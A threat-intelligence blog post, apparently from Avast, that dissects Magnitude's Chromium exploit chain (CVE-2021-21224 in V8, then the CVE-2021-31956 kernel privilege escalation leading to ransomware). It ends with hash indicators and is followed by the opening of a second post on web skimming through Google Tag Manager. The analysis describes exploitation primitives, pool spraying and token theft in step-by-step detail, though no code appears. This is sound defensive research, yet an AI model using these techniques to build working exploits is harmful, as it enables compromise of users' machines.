We’ve been monitoring the exploit kit landscape very closely since our discoveries, watching out for any new developments. We were waiting for other exploit kits to jump on the bandwagon, but none other did, as far as we can tell. What’s more, Magnitude seems to have abandoned the Chromium exploit chain. And while Underminer still continues to use these exploits today, its traditional IE exploit chains are doing much better. According to our telemetry, less than 20% of Underminer’s exploitation attempts are targeting Chromium-based browsers.

This is some very good news because it suggests that the Chromium exploit chains were not as successful as the attackers hoped they would be and that it is not currently very profitable for exploit kit developers to target Chromium users. In this blog post, we would like to offer some thoughts into why that could be the case and why the attackers might have even wanted to develop these exploits in the first place. And since we don’t get to see a new Chromium exploit chain in the wild every day, we will also dissect Magnitude’s exploits and share some detailed technical information about them.

Exploit Kit Theory

To understand why exploit kit developers might have wanted to test Chromium exploits, let’s first look at things from their perspective. Their end goal in developing and maintaining an exploit kit is to make a profit: they just simply want to maximize the difference between money “earned” and money spent. To achieve this goal, most modern exploit kits follow a simple formula. They buy ads targeted to users who are likely to be vulnerable to their exploits (e.g. Internet Explorer users). These ads contain JavaScript code that is automatically executed, even when the victim doesn’t interact with the ad in any way (sometimes referred to as drive-by attacks). This code can then further profile the victim’s browser environment and select a suitable exploit for that environment. If the exploitation succeeds, a malicious payload (e.g. ransomware or a coinminer) is deployed to the victim. In this scenario, the money “earned” could be the ransom or mining rewards. On the other hand, the money spent is the cost of ads, infrastructure (renting servers, registering domain names etc.), and the time the attacker spends on developing and maintaining the exploit kit.

Modus operandi of a typical browser exploit kit

The attackers would like to have many diverse exploits ready at any given time because it would allow them to cast a wide net for potential victims. But it is important to note that individual exploits generally get less effective over time. This is because the number of people susceptible to a known vulnerability will decrease as some people patch and other people upgrade to new devices (which are hopefully not plagued by the same vulnerabilities as their previous devices). This forces the attackers to always look for new vulnerabilities to exploit. If they stick with the same set of exploits for years, their profit would eventually reduce down to almost nothing.

So how do they find the right vulnerabilities to exploit? After all, there are thousands of CVEs reported each year, but only a few of them are good candidates for being included in an exploit kit. Weaponizing an exploit generally takes a lot of time (unless, of course, there is a ready-to-use PoC or the exploit can be stolen from a competitor), so the attackers might first want to carefully take into account multiple characteristics of each vulnerability. If a vulnerability scores well across these characteristics, it looks like a good candidate for inclusion in an exploit kit. Some of the more important characteristics are listed below.

  • Prevalence of the vulnerability
    The more users are affected by the vulnerability, the more attractive it is to the attackers. 
  • Exploit reliability
    Many exploits rely on some assumptions or are based on a race condition, which makes them fail some of the time. The attackers obviously prefer high-reliability exploits.
  • Difficulty of exploit development
    This determines the time that needs to be spent on exploit development (if the attackers are even capable of exploiting the vulnerability). The attackers tend to prefer vulnerabilities with a public PoC exploit, which they can often just integrate into their exploit kit with minimal effort.
  • Targeting precision
    The attackers care about how hard it is to identify (and target ads to) vulnerable victims. If they misidentify victims too often (meaning that they serve exploits to victims who they cannot exploit), they’ll just lose money on the malvertising.
  • Expected vulnerability lifetime
    As was already discussed, each vulnerability gets less effective over time. However, the speed at which the effectiveness drops can vary a lot between vulnerabilities, mostly based on how effective is the patching process of the affected software.
  • Exploit detectability
    The attackers have to deal with numerous security solutions that are in the business of protecting their users against exploits. These solutions can lower the exploit kit’s success rate by a lot, which is why the attackers prefer more stealthy exploits that are harder for the defenders to detect. 
  • Exploit potential
    Some exploits give the attackers System, while others might make them only end up inside a sandbox. Exploits with less potential are also less useful, because they either need to be chained with other LPE exploits, or they place limits on what the final malicious payload is able to do.

Looking at these characteristics, the most plausible explanation for the failure of the Chromium exploit chains is the expected vulnerability lifetime. Google is extremely good at forcing users to install browser patches: Chrome updates are pushed to users when they’re ready and can happen many times in a month (unlike e.g. Internet Explorer updates which are locked into the once-a-month “Patch Tuesday” cycle that is only broken for exceptionally severe vulnerabilities). When CVE-2021-21224 was a zero-day vulnerability, it affected billions of users. Within a few days, almost all of these users received a patch. The only unpatched users were those who manually disabled (or broke) automatic updates, those who somehow managed not to relaunch the browser in a long time, and those running Chromium forks with bad patching habits.

A secondary reason for the failure could be attributed to bad targeting precision. Ad networks often allow the attackers to target ads based on various characteristics of the user’s browser environment, but the specific version of the browser is usually not one of these characteristics. For Internet Explorer vulnerabilities, this does not matter that much: the attackers can just buy ads for Internet Explorer users in general. As long as a certain percentage of Internet Explorer users is vulnerable to their exploits, they will make a profit. However, if they just blindly targeted Google Chrome users, the percentage of vulnerable victims might be so low, that the cost of malvertising would outweigh the money they would get by exploiting the few vulnerable users. Google also plans to reduce the amount of information given in the User-Agent string. Exploit kits often heavily rely on this string for precise information about the browser version. With less information in the User-Agent header, they might have to come up with some custom version fingerprinting, which would most likely be less accurate and costly to manage.

Now that we have some context about exploit kits and Chromium, we can finally speculate about why the attackers decided to develop the Chromium exploit chains. First of all, adding new vulnerabilities to an exploit kit seems a lot like a “trial and error” activity. While the attackers might have some expectations about how well a certain exploit will perform, they cannot know for sure how useful it will be until they actually test it out in the wild. This means it should not be surprising that sometimes, their attempts to integrate an exploit turn out worse than they expected. Perhaps they misjudged the prevalence of the vulnerabilities or thought that it would be easier to target the vulnerable victims. Perhaps they focused too much on the characteristics that the exploits do well on: after all, they have reliable, high-potential exploits for a browser that’s used by billions. It could also be that this was all just some experimentation where the attackers just wanted to explore the land of Chromium exploits.

It’s also important to point out that the usage of Internet Explorer (which is currently vital for the survival of exploit kits) has been steadily dropping over the past few years. This may have forced the attackers to experiment with how viable exploits for other browsers are because they know that sooner or later they will have to make the switch. But judging from these attempts, the attackers do not seem fully capable of making the switch as of now. That is some good news because it could mean that if nothing significant changes, exploit kits might be forced to retire when Internet Explorer usage drops below some critical limit.


Let’s now take a closer look at the Magnitude’s exploit chain that we discovered in the wild. The exploitation starts with a JavaScript exploit for CVE-2021-21224. This is a type confusion vulnerability in V8, which allows the attacker to execute arbitrary code within a (sandboxed) Chromium renderer process. A zero-day exploit for this vulnerability (or issue 1195777, as it was known back then since no CVE ID had been assigned yet) was dumped on Github on April 14, 2021. The exploit worked for a couple of days against the latest Chrome version, until Google rushed out a patch about a week later.

It should not be surprising that Magnitude’s exploit is heavily inspired by the PoC on Github. However, while both Magnitude’s exploit and the PoC follow a very similar exploitation path, there are no matching code pieces, which suggests that the attackers didn’t resort that much to the “Copy/Paste” technique of exploit development. In fact, Magnitude’s exploit looks like a more cleaned-up and reliable version of the PoC. And since there is no obfuscation employed (the attackers probably meant to add it in later), the exploit is very easy to read and debug. There are even very self-explanatory function names, such as confusion_to_oob, addrof, and arb_write, and variable names, such as oob_array, arb_write_buffer, and oob_array_map_and_properties. The only way this could get any better for us researchers would be if the authors left a couple of helpful comments in there…

Interestingly, some parts of the exploit also seem inspired by a CTF writeup for a “pwn” challenge from *CTF 2019, in which the players were supposed to exploit a made-up vulnerability that was introduced into a fork of V8. While CVE-2021-21224 is obviously a different (and actual rather than made-up) vulnerability, many of the techniques outlined in that writeup apply for V8 exploitation in general and so are used in the later stages of the Magnitude’s exploit, sometimes with the very same variable names as those used in the writeup.

The core of the exploit, triggering the vulnerability to corrupt the length of vuln_array

The root cause of the vulnerability is incorrect integer conversion during the SimplifiedLowering phase. This incorrect conversion is triggered in the exploit by the Math.max call, shown in the code snippet above. As can be seen, the exploit first calls foofunc in a loop 0x10000 times. This is to make V8 compile that function because the bug only manifests itself after JIT compilation. Then, helper["gcfunc"] gets called. The purpose of this function is just to trigger garbage collection. We tested that the exploit also works without this call, but the authors probably put it there to improve the exploit’s reliability. Then, foofunc is called one more time, this time with flagvar=true, which makes xvar=0xFFFFFFFF. Without the bug, lenvar should now evaluate to -0xFFFFFFFF and the next statement should throw a RangeError because it should not be possible to create an array with a negative length. However, because of the bug, lenvar evaluates to an unexpected value of 1. The reason for this is that the vulnerable code incorrectly converts the result of Math.max from an unsigned 32-bit integer 0xFFFFFFFF to a signed 32-bit integer -1. After constructing vuln_array, the exploit calls Array.prototype.shift on it. Under normal circumstances, this method should remove the first element from the array, so the length of vuln_array should be zero. However, because of the disparity between the actual and the predicted value of lenvar, V8 makes an incorrect optimization here and just puts the 32-bit constant 0xFFFFFFFF into Array.length (this is computed as 0-1 with an unsigned 32-bit underflow, where 0 is the predicted length and -1 signifies Array.prototype.shift decrementing Array.length). 

A demonstration of how an overwrite on vuln_array can corrupt the length of oob_array

Now, the attackers have successfully crafted a JSArray with a corrupted Array.length, which allows them to perform out-of-bounds memory reads and writes. The very first out-of-bounds memory write can be seen in the last statement of the confusion_to_oob function. The exploit here writes 0xc00c to vuln_array[0x10]. This abuses the deterministic memory layout in V8 when a function creates two local arrays. Since vuln_array was created first, oob_array is located at a known offset from it in memory and so by making out-of-bounds memory accesses through vuln_array, it is possible to access both the metadata and the actual data of oob_array. In this case, the element at index 0x10 corresponds to offset 0x40, which is where Array.length of oob_array is stored. The out-of-bounds write therefore corrupts the length of oob_array, so it is now too possible to read and write past its end.

The addrof and fakeobj exploit primitives

Next, the exploit constructs the addrof and fakeobj exploit primitives. These are well-known and very powerful primitives in the world of JavaScript engine exploitation. In a nutshell, addrof leaks the address of a JavaScript object, while fakeobj creates a new, fake object at a given address. Having constructed these two primitives, the attacker can usually reuse existing techniques to get to their ultimate goal: arbitrary code execution. 

A step-by-step breakdown of the addrof primitive. Note that just the lower 32 bits of the address get leaked, while %DebugPrint returns the whole 64-bit address. In practice, this doesn’t matter because V8 compresses pointers by keeping upper 32 bits of all heap pointers constant.

Both primitives are constructed in a similar way, abusing the fact that vuln_array[0x7] and oob_array[0] point to the very same memory location. It is important to note here that  vuln_array is internally represented by V8 as HOLEY_ELEMENTS, while oob_array is PACKED_DOUBLE_ELEMENTS (for more information about internal array representation in V8, please refer to this blog post by the V8 devs). This makes it possible to write an object into vuln_array and read it (or more precisely, the pointer to it) from the other end in oob_array as a double. This is exactly how addrof is implemented, as can be seen above. Once the address is read, it is converted using helper["f2ifunc"] from double representation into an integer representation, with the upper 32 bits masked out, because the double takes 64 bits, while pointers in V8 are compressed down to just 32 bits. fakeobj is implemented in the same fashion, just the other way around. First, the pointer is converted into a double using helper["i2ffunc"]. The pointer, encoded as a double, is then written into oob_array[0] and then read from vuln_array[0x7], which tricks V8 into treating it as an actual object. Note that there is no masking needed in fakeobj because the double written into oob_array is represented by more bits than the pointer read from vuln_array.

The arbitrary read/write exploit primitives

With addrof and fakeobj in place, the exploit follows a fairly standard exploitation path, which seems heavily inspired by the aforementioned *CTF 2019 writeup. The next primitives constructed by the exploit are arbitrary read/write. To achieve these primitives, the exploit fakes a JSArray (aptly named fake in the code snippet above) in such a way that it has full control over its metadata. It can then overwrite the fake JSArray’s elements pointer, which points to the address where the actual elements of the array get stored. Corrupting the elements pointer allows the attackers to point the fake array to an arbitrary address, and it is then subsequently possible to read/write to that address through reads/writes on the fake array.

Let’s look at the implementation of the arbitrary read/write primitive in a bit more detail. The exploit first calls the get_arw function to set up the fake JSArray. This function starts by using an overread on oob_array[3] in order to leak map and properties of oob_array (remember that the original length of oob_array was 3 and that its length got corrupted earlier). The map and properties point to structures that basically describe the object type in V8. Then, a new array called point_array gets created, with the oob_array_map_and_properties value as its first element. Finally, the fake JSArray gets constructed at offset 0x20 before point_array. This offset was carefully chosen, so that the the JSArray structure corresponding to fake overlaps with elements of point_array. Therefore, it is possible to control the internal members of fake by modifying the elements of point_array. Note that elements in point_array take 64 bits, while members of the JSArray structure usually only take 32 bits, so modifying one element of point_array might overwrite two members of fake at the same time. Now, it should make sense why the first element of point_array was set to oob_array_map_and_properties. The first element is at the same address where V8 would look for the map and properties of fake. By initializing it like this, fake is created to be a PACKED_DOUBLE_ELEMENTS JSArray, basically inheriting its type from oob_array.

The second element of point_array overlaps with the elements pointer and Array.length of fake. The exploit uses this for both arbitrary read and arbitrary write, first corrupting the elements pointer to point to the desired address and then reading/writing to that address through fake[0]. However, as can be seen in the exploit code above, there are some additional actions taken that are worth explaining. First of all, the exploit always makes sure that addrvar is an odd number. This is because V8 expects pointers to be tagged, with the least significant bit set. Then, there is the addition of 2<<32 to addrvar. As was explained before, the second element of point_array takes up 64 bits in memory, while the elements pointer and Array.length both take up only 32 bits. This means that a write to point_array[1] overwrites both members at once and the 2<<32 just simply sets the Array.length, which is controlled by the most significant 32 bits. Finally, there is the subtraction of 8 from addrvar. This is because the elements pointer does not point straight to the first element, but instead to a FixedDoubleArray structure, which takes up eight bytes and precedes the actual element data in memory.

A dummy WebAssembly program that will get hollowed out and replaced by Magnitude’s shellcode

The final step taken by the exploit is converting the arbitrary read/write primitive into arbitrary code execution. For this, it uses a well-known trick that takes advantage of WebAssembly. When V8 JIT-compiles a WebAssembly function, it places the compiled code into memory pages that are both writable and executable (there now seem to be some new mitigations that aim to prevent this trick, but it is still working against V8 versions vulnerable to CVE-2021-21224). The exploit can therefore locate the code of a JIT-compiled WebAssembly function, overwrite it with its own shellcode and then call the original WebAssembly function from Javascript, which executes the shellcode planted there.

Magnitude’s exploit first creates a dummy WebAssembly module that contains a single function called main, which just returns the number 42 (the original code of this function doesn’t really matter because it will get overwritten with the shellcode anyway). Using a combination of addrof and arb_read, the exploit obtains the address where V8 JIT-compiled the function main. Interestingly, it then constructs a whole new arbitrary write primitive using an ArrayBuffer with a corrupted backing store pointer and uses this newly constructed primitive to write shellcode to the address of main. While it could theoretically use the first arbitrary write primitive to place the shellcode there, it chooses this second method, most likely because it is more reliable. It seems that the first method might crash V8 under some rare circumstances, which makes it not practical for repeated use, such as when it gets called thousands of times to write a large shellcode buffer into memory.

There are two shellcodes embedded in the exploit. The first one contains an exploit for CVE-2021-31956. This one gets executed first and its goal is to steal the SYSTEM token to elevate the privileges of the current process. After the first shellcode returns, the second shellcode gets planted inside the JIT-compiled WebAssembly function and executed. This second shellcode injects Magniber ransomware into some already running process and lets it encrypt the victim’s drives.


Let’s now turn our attention to the second exploit in the chain, which Magnitude uses to escape the Chromium sandbox. This is an exploit for CVE-2021-31956, a paged pool buffer overflow in the Windows kernel. It was discovered in June 2021 by Boris Larin from Kaspersky, who found it being used as a zero-day in the wild as a part of the PuzzleMaker attack. The Kaspersky blog post about PuzzleMaker briefly describes the vulnerability and the way the attackers chose to exploit it. However, much more information about the vulnerability can be found in a twopart blog series by Alex Plaskett from NCC Group. This blog series goes into great detail and pretty much provides a step-by-step guide on how to exploit the vulnerability. We found that the attackers behind Magnitude followed this guide very closely, even though there are certainly many other approaches that they could have chosen for exploitation. This shows yet again that publishing vulnerability research can be a double-edged sword. While the blog series certainly helped many defend against the vulnerability, it also made it much easier for the attackers to weaponize it.

The vulnerability lies in ntfs.sys, inside the function NtfsQueryEaUserEaList, which is directly reachable from the syscall NtQueryEaFile. This syscall internally allocates a temporary buffer on the paged pool (the size of which is controllable by a syscall parameter) and places there the NTFS Extended Attributes associated with a given file. Individual Extended Attributes are separated by a padding of up to four bytes. By making the padding start directly at the end of the allocated pool chunk, it is possible to trigger an integer underflow which results in NtfsQueryEaUserEaList writing subsequent Extended Attributes past the end of the pool chunk. The idea behind the exploit is to spray the pool so that chunks containing certain Windows Notification Facility (WNF) structures can be corrupted by the overflow. Using some WNF magic that will be explained later, the exploit gains an arbitrary read/write primitive, which it uses to steal the SYSTEM token.

The exploit starts by checking the victim’s Windows build number. Only builds 18362, 18363, 19041, and 19042 (19H1 – 20H2) are supported, and the exploit bails out if it finds itself running on a different build. The build number is then used to determine proper offsets into the _EPROCESS structure as well as to determine correct syscall numbers, because syscalls are invoked directly by the exploit, bypassing the usual syscall stubs in ntdll.

Check for the victim’s Windows build number

Next, the exploit brute-forces file handles, until it finds one on which it can use the NtSetEAFile syscall to set its NTFS Extended Attributes. Two attributes are set on this file, crafted to trigger an overflow of 0x10 bytes into the next pool chunk later when NtQueryEaFile gets called.

Specially crafted NTFS Extended Attributes, designed to cause a paged pool buffer overflow

When the specially crafted NTFS Extended Attributes are set, the exploit proceeds to spray the paged pool with _WNF_NAME_INSTANCE and _WNF_STATE_DATA structures. These structures are sprayed using the syscalls NtCreateWnfStateName and NtUpdateWnfStateData, respectively. The exploit then creates 10 000 extra _WNF_STATE_DATA structures in a row and frees each other one using NtDeleteWnfStateData. This creates holes between _WNF_STATE_DATA chunks, which are likely to get reclaimed on future pool allocations of similar size. 

With this in mind, the exploit now triggers the vulnerability using NtQueryEaFile, with a high likelihood of getting a pool chunk preceding a random _WNF_STATE_DATA chunk and thus overflowing into that chunk. If that really happens, the _WNF_STATE_DATA structure will get corrupted as shown below. However, the exploit doesn’t know which _WNF_STATE_DATA structure got corrupted, if any. To find the corrupted structure, it has to iterate over all of them and query its ChangeStamp using NtQueryWnfStateData. If the ChangeStamp contains the magic number 0xcafe, the exploit found the corrupted chunk. In case the overflow does not hit any _WNF_STATE_DATA chunk, the exploit just simply tries triggering the vulnerability again, up to 32 times. Note that in case the overflow didn’t hit a _WNF_STATE_DATA chunk, it might have corrupted a random chunk in the paged pool, which could result in a BSoD. However, during our testing of the exploit, we didn’t get any BSoDs during normal exploitation, which suggests that the pool spraying technique used by the attackers is relatively robust.

The corrupted _WNF_STATE_DATA instance. AllocatedSize and DataSize were both artificially increased, while ChangeStamp got set to an easily recognizable value.

After a successful _WNF_STATE_DATA corruption, more _WNF_NAME_INSTANCE structures get sprayed on the pool, with the idea that they will reclaim the other chunks freed by NtDeleteWnfStateData. By doing this, the attackers are trying to position a _WNF_NAME_INSTANCE chunk after the corrupted _WNF_STATE_DATA chunk in memory. To explain why they would want this, let’s first discuss what they achieved by corrupting the _WNF_STATE_DATA chunk.

The _WNF_STATE_DATA structure can be thought of as a header preceding an actual WnfStateData buffer in memory. The WnfStateData buffer can be read using the syscall NtQueryWnfStateData and written to using NtUpdateWnfStateData. _WNF_STATE_DATA.AllocatedSize determines how many bytes can be written to WnfStateData and _WNF_STATE_DATA.DataSize determines how many bytes can be read. By corrupting these two fields and setting them to a high value, the exploit gains a relative memory read/write primitive, obtaining the ability to read/write memory even after the original WnfStateData buffer. Now it should be clear why the attackers would want a _WNF_NAME_INSTANCE chunk after a corrupted _WNF_STATE_DATA chunk: they can use the overread/overwrite to have full control over a _WNF_NAME_INSTANCE structure. They just need to perform an overread and scan the overread memory for bytes 03 09 A8, which denote the start of their _WNF_NAME_INSTANCE structure. If they want to change something in this structure, they can just modify some of the overread bytes and overwrite them back using NtUpdateWnfStateData.

The exploit scans the overread memory, looking for a _WNF_NAME_INSTANCE header. 0x0903 here represents the NodeTypeCode, while 0xA8 is a preselected NodeByteSize.

What is so interesting about a _WNF_NAME_INSTANCE structure, that the attackers want to have full control over it? Well, first of all, at offset 0x98 there is _WNF_NAME_INSTANCE.CreatorProcess, which gives them a pointer to _EPROCESS relevant to the current process. Kaspersky reported that PuzzleMaker used a separate information disclosure vulnerability, CVE-2021-31955, to leak the _EPROCESS base address. However, the attackers behind Magnitude do not need to use a second vulnerability, because the _EPROCESS address is just there for the taking.

Another important offset is 0x58, which corresponds to _WNF_NAME_INSTANCE.StateData. As the name suggests, this is a pointer to a _WNF_STATE_DATA structure. By modifying this, the attackers can not only enlarge the WnfStateData buffer but also redirect it to an arbitrary address, which gives them an arbitrary read/write primitive. There are some constraints though, such as that the StateData pointer has to point 0x10 bytes before the address that is to be read/written and that there has to be some data there that makes sense when interpreted as a _WNF_STATE_DATA structure.

The StateData pointer gets first set to _EPROCESS+0x28, which allows the exploit to read _KPROCESS.ThreadListHead (interestingly, this value gets leaked using ChangeStamp and DataSize, not through WnfStateData). The ThreadListHead points to _KTHREAD.ThreadListEntry of the first thread, which is the current thread in the context of Chromium exploitation. By subtracting the offset of ThreadListEntry, the exploit gets the _KTHREAD base address for the current thread. 

With the base address of _KTHREAD, the exploit points StateData to _KTHREAD+0x220, which allows it to read/write up to three bytes starting from _KTHREAD+0x230. It uses this to set the byte at _KTHREAD+0x232 to zero. On the targeted Windows builds, the offset 0x232 corresponds to _KTHREAD.PreviousMode. Setting its value to SystemMode=0 tricks the kernel into believing that some of the thread’s syscalls are actually originating from the kernel. Specifically, this allows the thread to use the NtReadVirtualMemory and NtWriteVirtualMemory syscalls to perform reads and writes to the kernel address space.

The exploit corrupting _KTHREAD.PreviousMode

As was the case in the Chromium exploit, the attackers here just traded an arbitrary read/write primitive for yet another arbitrary read/write primitive. However, note that the new primitive based on PreviousMode is a significant upgrade compared to the original StateData one. Most importantly, the new primitive is free of the constraints associated with the original one. The new primitive is also more reliable because there are no longer race conditions that could potentially cause a BSoD. Not to mention that just simply calling NtWriteVirtualMemory is much faster and much less awkward than abusing multiple WNF-related syscalls to achieve the same result.

With a robust arbitrary read/write primitive in place, the exploit can finally do its thing and proceed to steal the SYSTEM token. Using the leaked _EPROCESS address from before, it finds _EPROCESS.ActiveProcessLinks, which leads to a linked list of other _EPROCESS structures. It iterates over this list until it finds the System process. Then it reads System’s _EPROCESS.Token and assigns this value (with some of the RefCnt bits masked out) to its own _EPROCESS structure. Finally, the exploit also turns off some mitigation flags in _EPROCESS.MitigationFlags.

Now, the exploit has successfully elevated privileges and can pass control to the other shellcode, which was designed to load Magniber ransomware. But before it does that, the exploit performs many cleanup actions that are necessary to avoid blue screening later on. It iterates over WNF-related structures using TemporaryNamesList from _EPROCESS.WnfContext and fixes all the _WNF_NAME_INSTANCE structures that got overflown into at the beginning of the exploit. It also attempts to fix the _POOL_HEADER of the overflown _WNF_STATE_DATA chunks. Finally, the exploit gets rid of both read/write primitives by setting _KTHREAD.PreviousMode back to UserMode=1 and using one last NtUpdateWnfStateData syscall to restore the corrupted StateData pointer back to its original value.

Fixups performed on previously corrupted _WNF_NAME_INSTANCE structures

Final Thoughts

If this isn’t the first time you’re hearing about Magnitude, you might have noticed that it often exploits vulnerabilities that were previously weaponized by APT groups, who used them as zero-days in the wild. To name a few recent examples, CVE-2021-31956 was exploited by PuzzleMaker, CVE-2021-26411 was used in a high-profile attack targeting security researchers, CVE-2020-0986 was abused in Operation Powerfall, and CVE-2019-1367 was reported to be exploited in the wild by an undisclosed threat actor (who might be DarkHotel APT according to Qihoo 360). The fact that the attackers behind Magnitude are so successful in reproducing complex exploits with no public PoCs could lead to some suspicion that they have somehow obtained under-the-counter access to private zero-day exploit samples. After all, we don’t know much about the attackers, but we do know that they are skilled exploit developers, and perhaps Magnitude is not their only source of income. But before we jump to any conclusions, we should mention that there are other, more plausible explanations for why they should prioritize vulnerabilities that were once exploited as zero-days. First, APT groups usually know what they are doing[citation needed]. If an APT group decides that a vulnerability is worth exploiting in the wild, that generally means that the vulnerability is reliably weaponizable. In a way, the attackers behind Magnitude could abuse this to let the APT groups do the hard work of selecting high-quality vulnerabilities for them. Second, zero-days in the wild usually attract a lot of research attention, which means that there are often detailed writeups that analyze the vulnerability’s root cause and speculate about how it could get exploited. These writeups make exploit development a lot easier compared to more obscure vulnerabilities which attracted only a limited amount of research.

As we’ve shown in this blog post, both Magnitude and Underminer managed to successfully develop exploit chains for Chromium on Windows. However, none of the exploit chains were particularly successful in terms of the number of exploited victims. So what does this mean for the future of exploit kits? We believe that unless some new, hard-to-patch vulnerability comes up, exploit kits are not something that the average Google Chrome user should have to worry about much. After all, it has to be acknowledged that Google does a great job at patching and reducing the browser’s attack surface. Unfortunately, the same cannot be said for all other Chromium-based browsers. We found that a big portion of those that we protected from Underminer were running Chromium forks that were months (or even years) behind on patching. Because of this, we recommend avoiding Chromium forks that are slow in applying security patches from the upstream. Also note that some Chromium forks might have vulnerabilities in their own custom codebase. But as long as the number of users running the vulnerable forks is relatively low, exploit kit developers will probably not even bother with implementing exploits specific just for them.

Finally, we should also mention that it is not entirely impossible for exploit kits to attack using zero-day or n-day exploits. If that were to happen, the attackers would probably carry out a massive burst of malvertising or watering hole campaigns. In such a scenario, even regular Google Chrome users would be at risk. The damage done by such an attack could be enormous, depending on the reaction time of browser developers, ad networks, security companies, LEAs, and other concerned parties. There are basically three ways that the attackers could get their hands on a zero-day exploit: they could either buy it, discover it themselves, or discover it being used by some other threat actor. Fortunately, using some simple math we can see that the campaign would have to be very successful if the attackers wanted to recover the cost of the zero-day, which is likely to discourage most of them. Regarding n-day exploitation, it all boils down to a race if the attackers can develop a working exploit sooner than a patch gets written and rolled out to the end users. It’s a hard race to win for the attackers, but it has been won before. We know of at least two cases when an n-day exploit working against the latest Google Chrome version was dumped on GitHub (this probably doesn’t need to be written down, but dumping such exploits on GitHub is not a very bright idea). Fortunately, these were just renderer exploits and there were no accompanying sandbox escape exploits (which would be needed for full weaponization). But if it is possible to win the race for one exploit, it’s not unthinkable that an attacker could win it for two exploits at the same time.

Indicators of Compromise (IoCs)

SHA-256 Note
71179e5677cbdfd8ab85507f90d403afb747fba0e2188b15bd70aac3144ae61a CVE-2021-21224 exploit
a7135b92fc8072d0ad9a4d36e81a6b6b78f1528558ef0b19cb51502b50cffe6d CVE-2021-21224 exploit
6c7ae2c24eaeed1cac0a35101498d87c914c262f2e0c2cd9350237929d3e1191 CVE-2021-31956 exploit
8c52d4a8f76e1604911cff7f6618ffaba330324490156a464a8ceaf9b590b40a payload injector
8ff658257649703ee3226c1748bbe9a2d5ab19f9ea640c52fc7d801744299676 payload injector
SHA-256 Note
2ac255e1e7a93e6709de3bbefbc4e7955af44dbc6f977b60618237282b1fb970 CVE-2021-21224 exploit
9552e0819f24deeea876ba3e7d5eff2d215ce0d3e1f043095a6b1db70327a3d2 HiddenBee loader
7a3ba9b9905f3e59e99b107e329980ea1c562a5522f5c8f362340473ebf2ac6d HiddenBee module container
2595f4607fad7be0a36cb328345a18f344be0c89ab2f98d1828d4154d68365f8 amd64/coredll.bin
ed7e6318efa905f71614987942a94df56fd0e17c63d035738daf97895e8182ab amd64/pcs.bin
c2c51aa8317286c79c4d012952015c382420e4d9049914c367d6e72d81185494 CVE-2019-0808 exploit
d88371c41fc25c723b4706719090f5c8b93aad30f762f62f2afcd09dd3089169 CVE-2020-1020 exploit
b201fd9a3622aff0b0d64e829c9d838b5f150a9b20a600e087602b5cdb11e7d3 CVE-2020-1054 exploit

The post Exploit Kits vs. Google Chrome appeared first on Avast Threat Labs.

Web Skimming Attacks Using Google Tag Manager

24 January 2022 at 14:00

E-commerce websites are much more popular than they used to be, people tend to shop online more and more often. This leads to the growth of an attack called web skimming. Web skimming is a type of attack on e-commerce websites in which an attacker inserts malicious code into a legitimate website. One of the most targeted e-commerce platforms is Magento. The reason why Magento is so popular among attackers is that Magento is known for many vulnerabilities. However, this doesn’t mean that other platforms aren’t being targeted, for example, sites using WooCommerce have also been victims.

In this posting, we go over what web skimming attacks are and how they work. We then analyze a series of web skimming attacks that we found which were active from March 2021 to the present. These attacks abused the Google Tag Manager and mainly targeted sites in Argentina and Saudi Arabia.

Overview of Web Skimming Attacks

The purpose of the malicious web skimming code is to steal the website’s customers’ payment details. This attack can simply be compared to an attack on physical ATMs, where instead of hardware skimmers, malicious code is used to steal payment card information.

Web skimming is dangerous because the customer often has no chance to know that a website has been compromised. Mostly, the attackers go after small e-commerce websites with poor security, but sometimes even a big e-commerce site can become a victim. In 2018, the British Airways website was infected by a web skimming attack. In 2019, forbesmagazine[.]com was infected, payment details were sent to the fontsawesome[.]gq. Later in 2020 a big online retailer selling beauty products, wishtrend[.]com, also became a victim of another web skimming attack. In 2021 another big e-commerce website store.segway[.]com was infected with a skimming attack.

We observed a webpage (wishtrend[.]com with more than 1M followers on Facebook) that was infected with web skimming in 2020. Later in 2021, the same website was infected with a phishing attack that imitates a Dropbox login.

How Web Skimming Attacks Work Under the Hood

A website can be breached and compromised both on the client side and on the server side. From the AV perspective, as we protect the end customers (client) and have no visibility on the server side, we focus on the client side. There can either be a single piece of malicious code hidden in infected websites, or more often, the attack can be split into two or more stages. First stage is a simple loader inserted in an infected website’s HTML or in an already existing javascript file. It can look like in the image below.

First stage of web skimming attack, example of malicious code inserted in websites

This code loads additional malicious code from an attacker’s domain, sometimes obfuscated, sometimes not. For the second stage, attackers usually use typosquatting domains to hide and act as a legitimate service. The malicious code gets the data from all (or in some cases specific) input forms and sends this data to the attacker’s server. 

To get the payment details, the attackers use one of the following techniques:

  • Stealing payment details directly from the original payment form
  • Inserting malicious payment form (used in cases when no form exists)
  • Redirecting to a malicious form on another website (can be placed on infected website or also on attacker’s website) 

The image below shows an example of a fake payment form in the red box. It is almost impossible to recognize that something is wrong, because on some e-commerce websites the payment form looks exactly the same and is valid. But in this case a little help is in the yellow box that says: “You will be redirected to the Realex website when you place an order. “ It means that if the website states that you will be redirected, then the payment form should not be directly on the e-commerce website and the user should expect to be redirected to the payment gateway (different website) with the form to enter payment details.

Example of a malicious payment form on an infected website

There is more than one way the second stage (the part which is responsible for stealing and sending stolen payment details to the attacker) of a web skimming attack can look. In the code snippet below, there is an example. Here the attackers use a POST request to exfiltrate payment details, but they can also use GET requests and WebSockets

Example of web skimming code

Stolen payment details are usually sold on the dark web. These datasets of credit cards that come from web skimming attacks are usually fresh and therefore they are better and can be sold for a higher price than for example data stolen from databases, which can be old in many cases. More information about selling stolen cards can be found in Yonathan Klijnsma’s

VB2019 paper: : Inside Magecart: the history behind the covert card-skimming assault on the e-Commerce industry.

Web Skimming using Google Tag Manager

In Q3 2021 we discovered a web skimming attack that uses Google Tag Manager (GTM) as a first stage. First, the infected webpage loads a script from googletagmanager[.]com/gtm.js?id=gtm-<code> via script injected in the HTML file shown on the image below.

Code snippet from index.html on infected e-commerce website

There is nothing unusual in this behaviour, many websites use Google Tag Manager and it looks exactly the same (it can be suspicious that the website loads more than one GTM script though). But if we look closer in the gtm.js file, we can find suspicious code in it. In the image below there is a comparison between malicious and clean GTM script. In the malicious file, there is added custom code that loads another javascript file from ganalitis[.]com. This is the feature of GTM, it is possible to add a custom script (which is then loaded from domain). 

Difference between usual and malicious GTM code

We were able to connect (based on our common signature and IP) ganalitis[.]com with similar domains from the same attacker (data from RiskIQ).

Domain Active from IP
ganalitics[.]com 2021-06-03 193[.]203[.]203[.]240
bingfindapi[.]com 2021-04-29 193[.]203[.]203[.]56
